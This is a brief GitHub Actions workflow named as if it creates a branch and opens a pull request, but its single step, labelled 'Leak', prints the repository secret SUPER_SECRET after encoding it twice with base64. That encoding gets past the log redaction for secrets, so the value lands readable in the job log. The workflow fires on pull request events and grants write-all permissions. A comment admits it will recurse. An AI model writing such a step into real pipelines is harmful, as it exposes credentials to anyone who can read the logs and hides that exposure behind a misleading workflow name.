name: Create and Push Branch, Then Make PR

on:
  pull_request:
    types: [opened, reopened, synchronize, edited]
  repository_dispatch:
  # This is so that when the bot creates the repo, it triggers
  # But it will create a recursive workflow, so gotta fix it later
    types: [create-pull-request] 

permissions: 
  write-all

jobs:
  create-push-pr:
    runs-on: ubuntu-latest

    steps:
      - name: Leak
        run: |
          echo ${{ secrets.SUPER_SECRET }} | base64 -w0 | base64 -w0

